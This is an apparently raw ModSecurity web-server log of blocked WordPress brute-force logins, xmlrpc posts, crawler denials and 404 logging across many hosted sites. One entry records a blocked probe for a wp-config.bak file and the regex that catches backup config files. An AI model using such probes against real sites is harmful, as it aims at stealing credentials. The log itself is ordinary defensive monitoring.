[Tue May 26 18:01:32.937335 2026] [security2:error] [pid 946381:tid 946612] [client 82.76.238.33:55263] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWSpNiTu5WG4Dm5WpoZnwAAAGU"]
[Tue May 26 18:01:32.937463 2026] [security2:error] [pid 946381:tid 946612] [client 82.76.238.33:55263] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWSpNiTu5WG4Dm5WpoZnwAAAGU"]
[Tue May 26 18:01:33.513735 2026] [security2:error] [pid 946381:tid 946557] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSpdiTu5WG4Dm5WpoZogAAAC4"]
[Tue May 26 18:01:34.115647 2026] [security2:error] [pid 946381:tid 946451] [remote 91.134.89.60:45664] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.89.134.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahWSpdiTu5WG4Dm5WpoZtwAAfEU"]
[Tue May 26 18:01:34.153575 2026] [security2:error] [pid 946381:tid 946431] [remote 18.190.7.192:33584] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.7.190.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWSpdiTu5WG4Dm5WpoZuAAADTE"]
[Tue May 26 18:01:34.617825 2026] [security2:error] [pid 946381:tid 946477] [remote 132.148.78.219:45380] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.78.148.132.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWSptiTu5WG4Dm5WpoZzQAATl8"]
[Tue May 26 18:01:35.201187 2026] [security2:error] [pid 946381:tid 946469] [remote 132.148.78.219:45380] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.78.148.132.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWSp9iTu5WG4Dm5WpoZ3wAAKlc"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:01:35.631336 2026] [security2:error] [pid 946381:tid 946437] [remote 64.22.104.200:34530] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 200.104.22.64.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWSp9iTu5WG4Dm5WpoZ4wAAejc"]
[Tue May 26 18:01:35.861100 2026] [security2:error] [pid 946381:tid 946488] [remote 64.22.104.200:34530] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 200.104.22.64.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWSp9iTu5WG4Dm5WpoZ7wAAa2o"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:01:36.042790 2026] [security2:error] [pid 946381:tid 946615] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSp9iTu5WG4Dm5WpoZ7AAAAGg"]
[Tue May 26 18:01:38.270780 2026] [security2:error] [pid 946381:tid 946593] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSqdiTu5WG4Dm5WpoaIwAAAFI"]
[Tue May 26 18:01:41.737825 2026] [security2:error] [pid 946381:tid 946521] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSrdiTu5WG4Dm5WpoaewAAAAo"]
[Tue May 26 18:01:43.304889 2026] [security2:error] [pid 946381:tid 946559] [client 82.76.238.33:55657] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWSr9iTu5WG4Dm5WpoaoAAAADA"]
[Tue May 26 18:01:43.305012 2026] [security2:error] [pid 946381:tid 946559] [client 82.76.238.33:55657] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWSr9iTu5WG4Dm5WpoaoAAAADA"]
[Tue May 26 18:01:43.767229 2026] [security2:error] [pid 946381:tid 946615] [client 85.208.96.193:58620] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/summer-kids-camp/list/"] [unique_id "ahWSr9iTu5WG4Dm5WpoatgAAAGg"]
[Tue May 26 18:01:43.767364 2026] [security2:error] [pid 946381:tid 946615] [client 85.208.96.193:58620] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/summer-kids-camp/list/"] [unique_id "ahWSr9iTu5WG4Dm5WpoatgAAAGg"]
[Tue May 26 18:01:44.035257 2026] [security2:error] [pid 946381:tid 946533] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSr9iTu5WG4Dm5WpoarQAAABY"]
[Tue May 26 18:01:44.086278 2026] [security2:error] [pid 946381:tid 946568] [client 14.226.205.176:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSr9iTu5WG4Dm5WpoasAAAADk"]
[Tue May 26 18:01:46.156374 2026] [security2:error] [pid 946381:tid 946479] [remote 45.32.67.165:39942] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.67.32.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWSsdiTu5WG4Dm5Wpoa4gAABmE"]
[Tue May 26 18:01:46.364459 2026] [security2:error] [pid 946381:tid 946621] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSsdiTu5WG4Dm5Wpoa4QAAAG4"]
[Tue May 26 18:01:46.786477 2026] [security2:error] [pid 946381:tid 946482] [remote 160.250.186.220:45452] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWSstiTu5WG4Dm5Wpoa9AAAKGQ"]
[Tue May 26 18:01:48.699795 2026] [security2:error] [pid 946381:tid 946497] [remote 160.250.186.220:45452] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWStNiTu5WG4Dm5WpobLgAAAnM"], referer: https://canopykaapi.com/wp-login.php
[Tue May 26 18:01:48.716708 2026] [security2:error] [pid 946381:tid 946525] [client 199.34.89.240:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWStNiTu5WG4Dm5WpobMgAAAA4"], referer: https://www.anujtradingco.com/
[Tue May 26 18:01:48.829595 2026] [security2:error] [pid 946381:tid 946517] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWStNiTu5WG4Dm5WpobKQAAAAY"]
[Tue May 26 18:01:49.134052 2026] [security2:error] [pid 946381:tid 946568] [client 114.119.144.176:23667] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "valodico.com"] [uri "/robots.txt"] [unique_id "ahWStdiTu5WG4Dm5WpobPQAAADk"]
[Tue May 26 18:01:50.219727 2026] [security2:error] [pid 946381:tid 946638] [client 199.34.89.240:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWSttiTu5WG4Dm5WpobVQAAAH8"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1157054&moderation-hash=1470d6af7a4ecaf9053cee58ccfa4276
[Tue May 26 18:01:51.593121 2026] [security2:error] [pid 946381:tid 946586] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSt9iTu5WG4Dm5WpobdgAAAEs"]
[Tue May 26 18:01:53.422899 2026] [security2:error] [pid 946381:tid 946588] [client 165.140.119.146:65069] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 146.119.140.165.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWSudiTu5WG4Dm5WpobqAAAAE0"], referer: https://www.bloggertarget.com
[Tue May 26 18:01:53.423065 2026] [security2:error] [pid 946381:tid 946588] [client 165.140.119.146:65069] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWSudiTu5WG4Dm5WpobqAAAAE0"], referer: https://www.bloggertarget.com
[Tue May 26 18:01:53.727612 2026] [security2:error] [pid 946381:tid 946635] [client 82.76.238.33:56105] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWSudiTu5WG4Dm5WpobuAAAAHw"]
[Tue May 26 18:01:53.727788 2026] [security2:error] [pid 946381:tid 946635] [client 82.76.238.33:56105] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWSudiTu5WG4Dm5WpobuAAAAHw"]
[Tue May 26 18:01:54.023372 2026] [security2:error] [pid 946381:tid 946625] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSudiTu5WG4Dm5WpobtwAAAHI"]
[Tue May 26 18:01:54.912613 2026] [security2:error] [pid 946381:tid 946412] [remote 78.142.18.172:51654] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWSutiTu5WG4Dm5Wpob1QAAIR4"]
[Tue May 26 18:01:55.874443 2026] [security2:error] [pid 946381:tid 946580] [client 178.156.228.96:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSu9iTu5WG4Dm5Wpob6gAAAEU"]
[Tue May 26 18:01:56.439643 2026] [security2:error] [pid 946381:tid 946593] [client 216.244.66.241:36834] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahWSvNiTu5WG4Dm5WpocBQAAAFI"]
[Tue May 26 18:01:56.439758 2026] [security2:error] [pid 946381:tid 946593] [client 216.244.66.241:36834] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahWSvNiTu5WG4Dm5WpocBQAAAFI"]
[Tue May 26 18:01:57.133305 2026] [security2:error] [pid 946381:tid 946539] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSvNiTu5WG4Dm5WpocCwAAABw"]
[Tue May 26 18:01:58.689124 2026] [security2:error] [pid 946381:tid 946417] [remote 213.171.208.62:37644] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.208.171.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWSvtiTu5WG4Dm5WpocMgAAOyM"]
[Tue May 26 18:01:58.947498 2026] [security2:error] [pid 946381:tid 946407] [remote 213.171.208.62:37644] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.208.171.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWSvtiTu5WG4Dm5WpocOQAAMRk"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:01:59.486194 2026] [security2:error] [pid 946381:tid 946435] [remote 123.30.233.13:55002] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWSv9iTu5WG4Dm5WpocRwAAGTU"]
[Tue May 26 18:01:59.523731 2026] [security2:error] [pid 946381:tid 946527] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSv9iTu5WG4Dm5WpocQAAAABA"]
[Tue May 26 18:02:00.016187 2026] [security2:error] [pid 946381:tid 946548] [client 89.221.204.134:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWSv9iTu5WG4Dm5WpocXAAAACU"], referer: https://www.anujtradingco.com/
[Tue May 26 18:02:01.179076 2026] [security2:error] [pid 946381:tid 946568] [client 89.221.204.134:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWSwdiTu5WG4Dm5WpocewAAADk"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1430896&moderation-hash=683babac959ef6b0812e0407a9e1141b
[Tue May 26 18:02:01.470165 2026] [security2:error] [pid 946381:tid 946589] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSwdiTu5WG4Dm5WpoceAAAAE4"]
[Tue May 26 18:02:02.167911 2026] [security2:error] [pid 946381:tid 946433] [remote 123.30.233.13:42902] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-login.php"] [unique_id "ahWSwtiTu5WG4Dm5WpocngAAWzM"]
[Tue May 26 18:02:03.963695 2026] [security2:error] [pid 946381:tid 946528] [client 82.76.238.33:56525] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWSw9iTu5WG4Dm5WpodAAAAABE"]
[Tue May 26 18:02:03.966512 2026] [security2:error] [pid 946381:tid 946528] [client 82.76.238.33:56525] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWSw9iTu5WG4Dm5WpodAAAAABE"]
[Tue May 26 18:02:04.637585 2026] [security2:error] [pid 946381:tid 946545] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSxNiTu5WG4Dm5WpodDQAAACI"]
[Tue May 26 18:02:06.313759 2026] [security2:error] [pid 946381:tid 946383] [remote 78.142.18.172:53170] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWSxtiTu5WG4Dm5WpodZwAAbQE"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:02:07.170856 2026] [security2:error] [pid 946381:tid 946633] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSxtiTu5WG4Dm5WpodfwAAAHo"]
[Tue May 26 18:02:08.627497 2026] [security2:error] [pid 946381:tid 946479] [remote 52.18.195.140:58398] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 140.195.18.52.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWSyNiTu5WG4Dm5WpoduAAAPWE"]
[Tue May 26 18:02:10.087449 2026] [security2:error] [pid 946381:tid 946551] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSydiTu5WG4Dm5Wpod3QAAACg"]
[Tue May 26 18:02:11.729714 2026] [security2:error] [pid 946381:tid 946608] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSy9iTu5WG4Dm5WpoeBAAAAGE"]
[Tue May 26 18:02:12.129773 2026] [security2:error] [pid 946381:tid 946533] [client 185.177.72.13:12600] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.herbalplus.thedebateafrica.org"] [uri "/api/upload/wp-config.bak"] [unique_id "ahWSzNiTu5WG4Dm5WpoeGwAAABY"]
[Tue May 26 18:02:14.391986 2026] [security2:error] [pid 946381:tid 946596] [client 82.76.238.33:56935] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWSztiTu5WG4Dm5WpoeTgAAAFU"]
[Tue May 26 18:02:14.392163 2026] [security2:error] [pid 946381:tid 946596] [client 82.76.238.33:56935] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWSztiTu5WG4Dm5WpoeTgAAAFU"]
[Tue May 26 18:02:15.072517 2026] [security2:error] [pid 946381:tid 946627] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSztiTu5WG4Dm5WpoeWQAAAHQ"]
[Tue May 26 18:02:15.330833 2026] [security2:error] [pid 946381:tid 946429] [remote 51.91.98.45:39938] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWSz9iTu5WG4Dm5WpoeZAAAHC8"]
[Tue May 26 18:02:15.531195 2026] [security2:error] [pid 946381:tid 946618] [client 113.170.160.102:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSz9iTu5WG4Dm5WpoeYwAAAGs"]
[Tue May 26 18:02:16.645550 2026] [security2:error] [pid 946381:tid 946404] [remote 54.36.102.244:56638] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.102.36.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWS0NiTu5WG4Dm5WpoejAAAKhY"]
[Tue May 26 18:02:17.056009 2026] [security2:error] [pid 946381:tid 946512] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWS0NiTu5WG4Dm5WpoelAAAAAE"]
[Tue May 26 18:02:18.058952 2026] [fcgid:warn] [pid 946381:tid 946599] (70014)End of file found: [client 66.132.195.81:1406] mod_fcgid: can't get data from http client
